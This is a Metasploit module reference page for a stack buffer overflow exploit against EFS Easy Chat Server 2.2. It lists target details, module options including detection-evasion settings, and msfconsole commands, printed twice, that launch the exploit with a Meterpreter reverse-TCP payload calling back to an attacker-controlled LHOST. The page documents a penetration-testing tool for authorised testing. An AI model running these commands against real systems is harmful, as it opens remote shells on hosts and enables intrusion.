Metasploit Penetration Testing Framework
EFS Easy Chat Server Authentication Request Handling Buffer Overflow
This module exploits a stack buffer overflow in EFS Software Easy Chat Server. By sending a overly long authentication request, an attacker may be able to execute arbitrary code. NOTE: The offset to SEH is influenced by the installation path of the program. The path, which defaults to "C:\Program Files\Easy Chat Server", is concatentated with "\users\" and the string passed as the username HTTP paramter.
Rank
- Great
Authors
- LSO < lso [at] hushmail.com >
References
Exploit Targets
- 0 - Easy Chat Server 2.2 (default)
Development
Similar Modules
- exploit/windows/http/adobe_robohelper_authbypass
- exploit/windows/http/altn_securitygateway
- exploit/windows/http/altn_webadmin
- exploit/windows/http/amlibweb_webquerydll_app
- exploit/windows/http/apache_chunked
- exploit/windows/http/apache_mod_rewrite_ldap
- exploit/windows/http/apache_modjk_overflow
- exploit/windows/http/badblue_ext_overflow
- exploit/windows/http/badblue_passthru
- exploit/windows/http/bea_weblogic_jsessionid
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/http/efs_easychatserver_username
msf exploit(efs_easychatserver_username) > show payloads
msf exploit(efs_easychatserver_username) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(efs_easychatserver_username) > set LHOST [MY IP ADDRESS]
msf exploit(efs_easychatserver_username) > set RHOST [TARGET IP]
msf exploit(efs_easychatserver_username) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/http/efs_easychatserver_username
msf exploit(efs_easychatserver_username) > show payloads
msf exploit(efs_easychatserver_username) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(efs_easychatserver_username) > set LHOST [MY IP ADDRESS]
msf exploit(efs_easychatserver_username) > set RHOST [TARGET IP]
msf exploit(efs_easychatserver_username) > exploit
Module Options
| PATH | Installation path of Easy Chat Server (default: C:\Program Files\Easy Chat Server) |
| Proxies | Use a proxy chain |
| RHOST | The target address |
| RPORT | The target port (default: 80) |
| VHOST | HTTP server virtual host |
| BasicAuthPass | The HTTP password to specify for basic authentication |
| BasicAuthUser | The HTTP username to specify for basic authentication |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| DynamicSehRecord | Generate a dynamic SEH record (more stealthy) |
| EnableContextEncoding | Use transient context when encoding payloads |
| FingerprintCheck | Conduct a pre-exploit fingerprint verification |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| UserAgent | The User-Agent header to use for all requests |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| HTTP::header_folding | Enable folding of HTTP headers |
| HTTP::method_random_case | Use random casing for the HTTP method |
| HTTP::method_random_invalid | Use a random invalid, HTTP method for request |
| HTTP::method_random_valid | Use a random, but valid, HTTP method for request |
| HTTP::pad_fake_headers | Insert random, fake headers into the HTTP request |
| HTTP::pad_fake_headers_count | How many fake headers to insert into the HTTP request |
| HTTP::pad_get_params | Insert random, fake query string variables into the request |
| HTTP::pad_get_params_count | How many fake query string variables to insert into the request |
| HTTP::pad_method_uri_count | How many whitespace characters to use between the method and uri |
| HTTP::pad_method_uri_type | What type of whitespace to use between the method and uri (accepted: space, tab, apache) |
| HTTP::pad_post_params | Insert random, fake post variables into the request |
| HTTP::pad_post_params_count | How many fake post variables to insert into the request |
| HTTP::pad_uri_version_count | How many whitespace characters to use between the uri and version |
| HTTP::pad_uri_version_type | What type of whitespace to use between the uri and version (accepted: space, tab, apache) |
| HTTP::uri_dir_fake_relative | Insert fake relative directories into the uri |
| HTTP::uri_dir_self_reference | Insert self-referential directories into the uri |
| HTTP::uri_encode_mode | Enable URI encoding (accepted: none, hex-normal, hex-all, hex-random, u-normal, u-all, u-random) |
| HTTP::uri_fake_end | Add a fake end of URI (eg: /%20HTTP/1.0/../../) |
| HTTP::uri_fake_params_start | Add a fake start of params to the URI (eg: /%3fa=b/../) |
| HTTP::uri_full_url | Use the full URL for all HTTP requests |
| HTTP::uri_use_backslashes | Use back slashes instead of forward slashes in the uri |
Metasploit Framework
Copyright © 2003-2010 Rapid7 LLC
Rapid7 Privacy Statement
Rapid7 Privacy Statement